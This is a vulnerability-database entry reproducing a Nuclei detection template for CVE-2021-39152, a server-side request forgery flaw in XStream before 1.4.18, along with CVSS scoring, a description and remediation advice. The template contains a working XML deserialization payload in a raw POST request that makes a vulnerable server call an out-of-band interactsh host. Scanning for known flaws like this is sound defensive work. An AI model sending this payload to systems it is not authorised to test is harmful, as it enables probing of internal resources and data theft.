Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-39152
HistoryMar 12, 2023 - 3:38 a.m.

XStream <1.4.18 - Server-Side Request Forgery

2023-03-1203:38:05
ProjectDiscovery
github.com
2

8.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

HIGH

Privileges Required

LOW

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

8.4 High

AI Score

Confidence

High

6 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:S/C:P/I:P/A:P

0.012 Low

EPSS

Percentile

85.3%

XStream before 1.4.18 is susceptible to server-side request forgery. An attacker can request data from internal resources that are not publicly available by manipulating the processed input stream with a Java runtime version 14 to 8. This makes it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
id: CVE-2021-39152

info:
  name: XStream <1.4.18 - Server-Side Request Forgery
  author: pwnhxl
  severity: high
  description: |
    XStream before 1.4.18 is susceptible to server-side request forgery. An attacker can request data from internal resources that are not publicly available by manipulating the processed input stream with a Java runtime version 14 to 8. This makes it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could result in unauthorized access to sensitive internal resources or services.
  remediation: |
    Upgrade XStream to version 1.4.18 or later to mitigate the vulnerability.
  reference:
    - https://x-stream.github.io/CVE-2021-39152.html
    - https://github.com/x-stream/xstream/security/advisories/GHSA-xw4p-crpj-vjx2
    - https://security.netapp.com/advisory/ntap-20210923-0003/
    - https://nvd.nist.gov/vuln/detail/cve-2021-39152
    - https://lists.debian.org/debian-lts-announce/2021/09/msg00017.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 8.5
    cve-id: CVE-2021-39152
    cwe-id: CWE-502
    epss-score: 0.01242
    epss-percentile: 0.83992
    cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: xstream_project
    product: xstream
  tags: cve2021,cve,xstream,ssrf,oast,xstream_project

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <map>
          <entry>
            <jdk.nashorn.internal.runtime.Source_-URLData>
              <url>http://{{interactsh-url}}/internal/</url>
              <cs>GBK</cs>
              <hash>1111</hash>
              <array>b</array>
              <length>0</length>
              <lastModified>0</lastModified>
            </jdk.nashorn.internal.runtime.Source_-URLData>
            <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>
          </entry>
          <entry>
            <jdk.nashorn.internal.runtime.Source_-URLData>
              <url>http://{{interactsh-url}}/internal/</url>
              <cs reference='../../../entry/jdk.nashorn.internal.runtime.Source_-URLData/cs'/>
              <hash>1111</hash>
              <array>b</array>
              <length>0</length>
              <lastModified>0</lastModified>
            </jdk.nashorn.internal.runtime.Source_-URLData>
            <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>
          </entry>
        </map>

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: Java"
# digest: 490a00463044022066c9ce151ee358bbe8455f9b617c8364fb827e63a620fb317affb71e693de0e102200a11031cf4158ec89817f2f860b0878dd4f93c94685a0e1e5d0a7ce837143d39:922c64590222798bb761d5b6d8e72950

8.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

HIGH

Privileges Required

LOW

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

8.4 High

AI Score

Confidence

High

6 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:S/C:P/I:P/A:P

0.012 Low

EPSS

Percentile

85.3%